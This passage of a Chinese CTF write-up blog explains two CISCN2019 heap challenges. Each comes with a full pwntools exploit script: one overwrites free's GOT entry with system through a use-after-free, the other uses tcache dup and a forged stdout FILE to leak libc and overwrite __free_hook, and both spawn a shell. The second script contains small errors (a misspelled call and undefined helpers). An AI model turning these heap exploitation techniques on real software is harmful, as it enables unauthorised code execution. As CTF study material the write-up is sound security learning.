<p>对于一道堆题来说几乎没有开什么保护机制。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-9bb49cc235d2222d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"><br>由于<strong>got</strong>表可写，于是考虑最终将<strong>free_got</strong>修改为<strong>system()</strong>地址来<strong>get shell</strong>。<br>第一步，准备通过两个<strong>Header</strong>指向一个<strong>unsort bin</strong>大小的<strong>data</strong>来<strong>leak libc</strong>基址。<br>第二步，构造出一个<strong>0x18</strong>大小的堆块既是<strong>Header</strong>又是<strong>data</strong>的布局。<br>第三步，利用<strong>Header2</strong>来修改<strong>Header3</strong>中的<strong>data</strong>字段，再通过编辑<strong>Header3</strong>的<strong>data</strong>达到任意地址写的目的，这里选择将<strong>free_got</strong>修改为<strong>system()</strong>。<br>第四步，通过<strong>free</strong>之前布置好的<strong>data</strong>为<strong>‘/bin/sh\x00’</strong>的对应<strong>Header</strong>来<strong>get shell</strong>。<br>堆布局大概如下图所示。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-d34e52f245996baa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="堆布局"></p>
<ul>
<li><strong>my-exp</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	p = process(<span class="string">'./pwn'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'e095ff54e419a6e01532dee4ba86fa9c.kr-lab.com'</span> , <span class="number">40002</span>)<span class="comment">#nc e095ff54e419a6e01532dee4ba86fa9c.kr-lab.com 40002</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./pwn'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(data)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'data:\n'</span>)</span><br><span class="line">    p.sendline(data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(index)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">    p.sendline(<span class="string">'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'index: '</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    <span class="keyword">return</span> p.recvuntil(<span class="string">'\n----'</span>)[:<span class="number">-5</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(index , data)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">    p.sendline(<span class="string">'3'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'index: '</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    p.sendline(data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">    p.sendline(<span class="string">'4'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'index: '</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">print</span> pidof(p)</span><br><span class="line">    raw_input()</span><br><span class="line"></span><br><span class="line"><span class="comment">#step1 leak libc_base</span></span><br><span class="line">add(<span class="string">'a'</span> * <span class="number">0x17</span>)         <span class="comment">#0</span></span><br><span class="line">add(<span class="string">'a'</span> * <span class="number">0x17</span>)         <span class="comment">#1</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="string">'a'</span> * <span class="number">0x7f</span>)         <span class="comment">#2</span></span><br><span class="line">add(<span class="string">'a'</span> * <span class="number">0x7f</span>)         <span class="comment">#3</span></span><br><span class="line">add(<span class="string">'/bin/sh\x00'</span>)      <span class="comment">#4</span></span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">libc.address = u64(show(<span class="number">3</span>).ljust(<span class="number">8</span> , <span class="string">'\x00'</span>)) - <span class="number">0x3c4b78</span></span><br><span class="line">system_addr = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">free_got = elf.got[<span class="string">'free'</span>]</span><br><span class="line">success(<span class="string">'libc_base =&gt; '</span> + hex(libc.address))</span><br><span class="line">success(<span class="string">'system_addr =&gt; '</span> + hex(system_addr))</span><br><span class="line">success(<span class="string">'free_got =&gt; '</span> + hex(free_got))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step2 use UAF to change free_got to system_addr</span></span><br><span class="line">fake_header = p32(<span class="number">0x3</span>) + p32(<span class="number">0x7f</span>)</span><br><span class="line">payload = fake_header + p64(free_got)</span><br><span class="line">edit(<span class="number">1</span> , payload)</span><br><span class="line">edit(<span class="number">3</span> , p64(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#Get Shell &amp; Have Fun</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="0x05-bms"><a href="#0x05-bms" class="headerlink" title="0x05 bms"></a>0x05 bms</h2><p>听说远程是<strong>Tcache</strong><br><strong>……</strong>最近恶补了<strong>Tcache</strong>机制以及<strong>FILE</strong>结构体后来看这道题就很容易了。</p>
<ul>
<li>程序功能</li>
</ul>
<p>进入输入管理员的密码后，是一个菜单类型的题目，管理了一个<strong>book</strong>的结构体，该结构体数据结构如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">Book</span>&#123;</span></span><br><span class="line">    <span class="keyword">char</span>[<span class="number">0x10</span>] BookName;</span><br><span class="line">    <span class="keyword">char</span>* description;</span><br><span class="line">    <span class="keyword">int</span> length;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>该结构体的大小为<strong>0x20</strong>字节，有<strong>add</strong>和<strong>delete</strong>两个操作，程序有限制最多<strong>add10</strong>本书，<strong>description</strong>的大小最大不超过<strong>0xFF</strong>字节。</p>
<ul>
<li>漏洞位置</li>
</ul>
<p>由于这道题当时没有给<strong>libc</strong>版本，默认为<strong>2.23</strong>来看好像没有什么漏洞，后来得知远程是<strong>2.26</strong>的版本，那就很有问题了：在进行<strong>delete</strong>操作时，并没有检查其<strong>description</strong>指向的堆块是否已经处于<strong>free</strong>的状态。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-67d35db7ff7feb40.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="delete"><br>在<strong>2.23</strong>版本时会直接报<strong>double free</strong>的错误，无法利用；而在<strong>2.26</strong>版本中则可利用<strong>tcache dup</strong>的方法。</p>
<ul>
<li>利用思路</li>
</ul>
<p><img src="https://upload-images.jianshu.io/upload_images/8447551-ff27fde749585f9b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"><br>这道题目除了<strong>PIE</strong>外其余保护机制全开，且本题目没有任何输入功能，没有很明显的<strong>leak</strong>地址的地方，因此考虑用<strong>FILE</strong>结构体的任意写来达到<strong>leak</strong>地址的目的，利用思路大概如下：<br>首先，肯定是要通过逆向的到管理员密码……<br>第二步，利用<strong>delete</strong>功能中未检查是否<strong>free</strong>的漏洞构造<strong>tcache dup</strong>；<br>第三步，修改下一个<strong>tcache</strong>的地址为<strong>stdout</strong>，再<strong>add</strong>将其作为<strong>description</strong>指针申请回去；<br>第四步，就是在<strong>description</strong>中伪造<strong>fake_FILE</strong>，顺理成章地<strong>leak</strong>出<strong>libc</strong>基址。<br>最后，就是故技重施<strong>tcache dup</strong>，修改<strong>free_hook</strong>为<strong>system</strong>，然后<strong>free</strong>掉<strong>/bin/sh\x00</strong>的<strong>description</strong></p>
<ul>
<li><strong>my-exp</strong><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    p = process(<span class="string">'./pwn'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="keyword">print</span> <span class="string">'time is up'</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'libc-2.27.so'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./pwn'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">()</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'username:'</span>)</span><br><span class="line">    p.sendline(<span class="string">'admin'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'password:'</span>)</span><br><span class="line">    p.sendline(<span class="string">'frame'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(name , length , description)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'book name:'</span>)</span><br><span class="line">    p.sendline(name)</span><br><span class="line">    p.recvuntil(<span class="string">'size:'</span>)</span><br><span class="line">    p.send(str(length))</span><br><span class="line">    p.recvuntil(<span class="string">'description:'</span>)</span><br><span class="line">    sd(description)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span><span class="params">(index)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'index:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">print</span> pidof(p)</span><br><span class="line">    raw_input()</span><br><span class="line"></span><br><span class="line">check()</span><br><span class="line"></span><br><span class="line"><span class="comment">#step1 use FILE structure to leak libc</span></span><br><span class="line">add(<span class="string">'0'</span> , <span class="number">0x50</span> , <span class="string">'0'</span>)</span><br><span class="line"><span class="comment">#tcache dup</span></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">stdout_addr = got(<span class="string">'stdout'</span>)</span><br><span class="line">add(<span class="string">'1'</span> , <span class="number">0x50</span> , p64(stdout_addr))</span><br><span class="line">add(<span class="string">'2'</span> , <span class="number">0x50</span> , <span class="string">'2'</span>)</span><br><span class="line">add(<span class="string">'3'</span> , <span class="number">0x50</span> , <span class="string">'\x60'</span>)                            <span class="comment">#stdout</span></span><br><span class="line"><span class="comment">#fake _IO_2_1_stdout</span></span><br><span class="line">payload = p64(<span class="number">0xfbad1800</span>) +  p64(<span class="number">0</span>)  +   p64(<span class="number">0</span>)   +   p64(<span class="number">0</span>)     + p64(stdout_addr) + p64(stdout_addr + <span class="number">8</span>) + p64(stdout_addr + <span class="number">8</span>)</span><br><span class="line"><span class="comment">#          _flags           read_ptr    read_end    read_base        write_base           write_ptr                 write_end</span></span><br><span class="line">add(<span class="string">'4'</span> , <span class="number">0x50</span> , payload)                       <span class="comment">#_IO_2_1_stdout</span></span><br><span class="line">libc.address = u64(ru(<span class="string">'done!'</span>)[:<span class="number">-5</span>].ljust(<span class="number">8</span> , <span class="string">'\x00'</span>)) - <span class="number">0x3ec760</span></span><br><span class="line">success(<span class="string">'libc_base =&gt; '</span> + hex(libc.address))</span><br><span class="line">free_hook = libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">success(<span class="string">'free_hook =&gt; '</span> + hex(free_hook))</span><br><span class="line">system_addr = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">suucess(<span class="string">'system_addr =&gt; '</span> + hex(system))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step2 overwrite __free_hook with system</span></span><br><span class="line">add(<span class="string">'5'</span> , <span class="number">0x40</span> , <span class="string">'5'</span>)</span><br><span class="line"><span class="comment">#tcache dup</span></span><br><span class="line">free(<span class="number">5</span>)</span><br><span class="line">free(<span class="number">5</span>)</span><br><span class="line">add(<span class="string">'6'</span> , <span class="number">0x40</span> , p64(free_hook))</span><br><span class="line">add(<span class="string">'7'</span> , <span class="number">0x40</span> , <span class="string">'/bin/sh\x00'</span>)</span><br><span class="line">add(<span class="string">'8'</span> , <span class="number">0x40</span> , p64(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#Get Shell &amp; Have Fun</span></span><br><span class="line">free(<span class="number">7</span>)</span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h2 id="0x06-Virtual"><a href="#0x06-Virtual" class="headerlink" title="#0x06 Virtual"></a>#0x06 Virtual</h2>
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a  href="/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/">CISCN2019 国赛线上初赛pwn</a></p>
        <p><span>文章作者:</span><a  href="/" title="访问 Fish_o0O 的个人博客">Fish_o0O</a></p>
        <p><span>发布时间:</span>2020年03月12日 - 20时30分</p>
        <p><span>最后更新:</span>2020年03月12日 - 18时55分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/" title="CISCN2019 国赛线上初赛pwn">http://fish-o0o.github.io/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/</a>
            <span class="copy-path" data-clipboard-text="原文: http://fish-o0o.github.io/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/　　作者: Fish_o0O" title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a  href="/2020/03/12/XNUCA2018%E5%88%9D%E8%B5%9Bpwn%20writeup/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          XNUCA2018初赛pwn writeup
        
      </div>
    </a>
  
  
    <a  href="/2020/03/12/Tcache%E6%9C%BA%E5%88%B6%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Tcache机制及漏洞利用方法</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-写在前面"><span class="toc-number">1.</span> <span class="toc-text">0x00 写在前面</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-your-pwn"><span class="toc-number">2.</span> <span class="toc-text">0x01 your_pwn</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-daily"><span class="toc-number">3.</span> <span class="toc-text">0x02 daily</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-baby-pwn"><span class="toc-number">4.</span> <span class="toc-text">0x03 baby_pwn</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-Double"><span class="toc-number">5.</span> <span class="toc-text">0x04 Double</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-bms"><span class="toc-number">6.</span> <span class="toc-text">0x05 bms</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-Virtual"><span class="toc-number">7.</span> <span class="toc-text">#0x06 Virtual</span></a></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>






    



    <div class="scroll" id="post-nav-button">
        
            <a  href="/2020/03/12/XNUCA2018%E5%88%9D%E8%B5%9Bpwn%20writeup/" title="上一篇: XNUCA2018初赛pwn writeup">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a  href="/2020/03/12/Tcache%E6%9C%BA%E5%88%B6%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/" title="下一篇: Tcache机制及漏洞利用方法">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/0CTF2018%20babyheap/">0CTF2018 babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CVE-2017-0199%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/">CVE-2017-0199 Microsoft Office 逻辑漏洞复现和利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/">HCTF2017 level2的两道pwn题</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CVE-2017-8570%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/">CVE-2017-8570 Microsoft Office 逻辑漏洞复现和利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/">第二届强网杯pwn writeup【部分】</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E5%88%B7Jarvis%20OJ%E6%97%B6%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B0%E5%A7%BF%E5%8A%BF%5B%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0%5D/">刷Jarvis OJ时学到的新姿势【不定时更新】</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E7%94%B1%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E5%BC%95%E5%8F%91%E7%9A%84DNS%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">由一道题目引发的DNS学习笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CVE-2012-0158%20Microsoft%20Office%20%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">CVE-2012-0158 Microsoft Office 栈溢出漏洞分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/BCTF2018%20baby_arena/">BCTF2018 baby_arena</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E5%B0%81%E4%BA%86%E4%B8%AA%E5%BA%93/">封了个库</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%B8%80%E5%9C%BAWriteup/">网鼎杯第一场Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/XNUCA2018%E5%88%9D%E8%B5%9Bpwn%20writeup/">XNUCA2018初赛pwn writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/">CISCN2019 国赛线上初赛pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/Tcache%E6%9C%BA%E5%88%B6%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/">Tcache机制及漏洞利用方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/Ubuntu%E8%99%9A%E6%8B%9F%E6%9C%BA%E6%89%A9%E5%AE%B9%20Step%20by%20Step/">Ubuntu虚拟机扩容 Step by Step</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/FILE%E7%BB%93%E6%9E%84%E4%BD%93%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/">FILE结构体及漏洞利用方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/Windows%E7%B3%BB%E7%BB%9F%E4%B8%8B%E5%85%B8%E5%9E%8B%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%BA%A7%E7%94%9F%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%E7%A0%94%E7%A9%B6/">Windows系统下典型堆漏洞产生原理及利用方法研究</a></li></ul>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2020 Fish_o0O
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo &nbsp;&nbsp;</a><a href="https://github.com/maochunguang" target="_blank">Blog</a> by tommy
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 3;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>






<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>